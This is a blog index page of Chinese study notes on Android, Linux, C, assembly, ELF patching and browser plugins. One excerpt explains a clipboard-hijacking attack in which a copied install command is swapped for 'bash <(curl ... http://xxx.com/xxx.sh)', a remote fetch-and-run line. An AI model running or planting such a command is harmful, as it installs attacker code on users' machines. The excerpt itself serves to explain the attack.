学习笔记
文章平均质量分 85
tangsilian
长期招移动安全
展开
-
走进安全:网络世界的攻与防读书笔记
走进安全:网络世界的攻与防读书笔记本书详细列举了企业安全的威胁和案列,安全设计安全防护的一些规范值得一看。第一章:安全简历一、诞生,从计算机到互联网(一)计算机的发展历史:1946年2月14日,世界上第一台电子管计算机在美国宾夕法尼亚大学诞生。在第一代电子管计算机之后,计算机技术又经历了三个重要的发展阶段:第二代晶体管计算机阶段,第三代中小规模集成电路计算机阶段和第四代超大规模集成电路计...原创 2020-04-19 00:38:00 · 1859 阅读 · 1 评论 -
分析一个android程序从建立到启动的过程
分析一个android程序从建立到启动的过程这是按下开机键后,程序启动的过程 第一步电源第二步引导程序第三步内核第四部init 进程第五步Zygote加载进程第六步系统服务或者服务第七核心服务:启动电源管理器;创建Activity管理器;启动电话注册;启动包管理器;设置Activity管理服务为系统进程;启动上下文管理器;启动系统Context Providers;启动电池服务;原创 2016-03-26 23:47:22 · 549 阅读 · 0 评论 -
【学习记录】dlopen和dlsym的使用
c语言为了使程序方便扩展,具备通用性,可以采用插件形式。采用异步事件驱动模型,保证主程序逻辑不变,将各个业务已动态链接库的形式加载进来,这就是所谓的插件。linux提供了加载和处理动态链接库的系统调用,非常方便。c语言提供api让我们加载动态链接库文件 android 即上的.so文件dlopen函数以指定模式打开指定的动态链接库文件,并返回一个句柄给dlsym()的调用进程dlclose 卸载原创 2016-09-07 17:04:13 · 962 阅读 · 0 评论 -
【学习记录】android源码下载
windows下:我用的是github离线版的客户端。里面自带git shell,打开git shell 新建一个目录,我存放的位置是E:\Android源码 cd到该目录下: 在 https://android.googlesource.com/ 选择你所要下载的android源码 然后git clone https://android.googlesource.com/platform/p原创 2016-08-22 11:53:30 · 534 阅读 · 0 评论 -
浏览器插件的编写
0x00背景 看到老东家安天的那篇AVL-insight开源情报分析平台的插件后,就想自己做一个插件玩玩。0x01需求 做一个自动输入讲url生成二维码的插件。。。开发流程:用到的工具:notepad++一个完整的插件:由4个部分组成,分别是manifest.json、.js文件、图标和HTML文件,设计插件就是设计这4类文件。manifest.jsonmanifest.json的作用是定义插件原创 2016-12-28 11:40:31 · 9678 阅读 · 0 评论 -
使用ELF解析工具patch ELF
pacth打补丁:我理解的意思是在不影响可执行文件运行的基础下,修复问文件出现的问题。这里使用quarklab的lief解析ELF文件并进行程序 patch:lief主要特点:解析:LIEF可以解析ELF,PE,MachO并提供一个用户友好的API来访问格式化内部。修改:LIEF可以修改这些格式的某些部分摘要:三种格式有 sections, symbols, entry point...等共原创 2017-12-29 16:20:39 · 4883 阅读 · 0 评论 -
网页复制的剪切板攻击
0x00 攻击场景在网页里copy 一段shell 代码 比如:pip install frida实际执行:bash <(curl -s -S -L http://xxx.com/xxx.sh),而且还TM的自动回车执行了。。。0x01 实现原理:在网页里使用js代码,改变复制的内容<html&amp原创 2018-11-07 11:54:10 · 1652 阅读 · 0 评论 -
【学习笔记】linux系统管理
进程管理1.进程的简介进程简单的理解就是正在运行的程序 有的时间长,有的时间短。 如ls,ps这种一瞬而过。2.进程的查看 –ps 和pstreeps aux 或者ps -leUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND 查看所有进程3.查看健康状态top - 14:01:59 up 16 d原创 2016-08-11 14:42:45 · 577 阅读 · 0 评论 -
【学习笔记】linux服务管理
linux服务管理LINUX 的运行级别:0-60:关机 1:单用户 2:不完整的命令行—无NFS服务 3:命令行 ———字符界面 4:系统保留 5:图形化 6:重启》》runlevel N(前一次的级别) 3(现在的级别)》》init 5修改默认的配置文件一开机就进入字符界面 vim /etc/inittab # Default runlevel. The runleve原创 2016-08-07 23:09:38 · 1166 阅读 · 8 评论 -
android与其他应用的交互
使用隐式的Intent Implicit Intents一般用于从一个app到另一个app 而显示的Intent是用于一个app内页面的跳转 需要声明指定的动作 如Uri number = Uri.parse(“tel:5551234”); Intent callIntent = new Intent(Intent.ACTION_DIAL, number); 指定电话号码的intent原创 2016-03-27 13:36:18 · 460 阅读 · 0 评论 -
sdk里面文件的含义和配置android studio
Sdk里面的各种文件的含义add-ons/包含SDK开发环境的附件,让我们开发在一些设备上可用的扩展库docs/包含一套HTML格式的完整文档, 包括开发指南, API 参考, 和其他信息platform-tools/包含依赖于平台的开发工具。该平台的工具,包括 Android Debug Bridge (adb)以及其他工具,通常你不会直接使用它们 。请注意它和tools/是分开的platform原创 2016-04-12 20:40:55 · 1092 阅读 · 0 评论 -
android服务器Bmob的使用
使用Bmob无需再造应用后端,便能轻松拥有应用开发的各种后端能力支持,减少了开发者将应用从idea到产品(成品)的时间,我们提供了大量标准的API接口,根据需要接入相关服务,开发者可以更加专注于应用的开发,让产品交付更快速。话不多少 先看代码 实现提交数据的功能public class MainActivity extends Activity { private EditText edt1原创 2016-04-18 19:57:29 · 1484 阅读 · 0 评论 -
疯狂安卓书籍的学习--未完待续~
疯狂安卓书籍的学习如何自定义view先建一个view类 重写ondraw方法 public class DrawView extends View { public float currentX = 40; public float currentY = 50; // 定义并创建画笔 Paint paint = new Paint(); public Dra原创 2016-05-04 21:07:16 · 564 阅读 · 0 评论 -
淘宝云梯分布式计算平台整体架构
淘宝在数据存储和处理领域在国内互联网公司中一直保持比较靠前的位置,而且由于电子商务领域独特的应用场景,淘宝在数据实时性和大规模计算及挖掘方面一直在国内保持着领先,因此积累了很多的实践的经验和产品。框架 数据处理 商贸局的一个项目 后台融合 管控所有的行为 数据服务器分布式处理(比如:武昌一台 光谷一台) 本地服务器(两条服务器之间可以架一条高速通路) 异地服务器(只能通过网络连接)原创 2016-05-09 13:23:55 · 1814 阅读 · 0 评论 -
【学习记录】如何找到apk所在的路径
插件框架实现思路及原理 一、技术可行性 a) apk的安装处理流程 i. apk会copy到/data/app; ii. 解压apk中的class.dex,并对其进行优化,获得odex(即JIT)。最后保存到/data/dalvik_cache; iii. 还有一些权限和包信息,会缓存到/data/system中的packages.list和packages.xml中。b) 在Androi原创 2016-08-09 16:15:34 · 3459 阅读 · 0 评论 -
【学习笔记】linux下的c语言的学习
linux下的c语言的学习c程序的编译过程.c—->.i—->.s—–>.o文件—->可执行文件 预处理 编译 汇编 链接预处理做了什么?第一步是展开头文件编译一个a.c文件,然后看预处理过后文件的样子 gcc -o a.i a.c -E vim编辑器 a.i第二步是宏定义//#define R 10 int a=R; 在.i文件里已经替换第三步是宏函数int原创 2016-08-07 21:47:27 · 646 阅读 · 0 评论 -
【学习记录】汇编基础知识的学习
arm汇编与x86汇编有什么不同?主要是工作模式不同,指令集不同,寄存器不同 arm有7种用户模式和其他6中特殊模式,寄存器37个31个通用,6个状态寄存器。 x86,51,arm7以及以前的版本都属于冯·诺依曼体系结构,arm9以后的版本都属于哈佛体系结构,运行效率更高,汇编语言的原理和编程思想都是一样的,首先要掌握处理器的体系结构,了解其工作过程,然后就可以编写汇编语言直接控制处理器处理数据原创 2016-08-09 21:25:18 · 505 阅读 · 0 评论 -
由eclispe转as的小技巧
如果不习惯as的快捷键方式 谷歌专门做了处理 按Ctrl+(tab上面那个键)选择eclispe就好了 2.file ->setting ->输入搜索框内输入line找Editor appearance 里面的show line number 然后打钩就行了。原创 2016-03-30 13:39:15 · 445 阅读 · 0 评论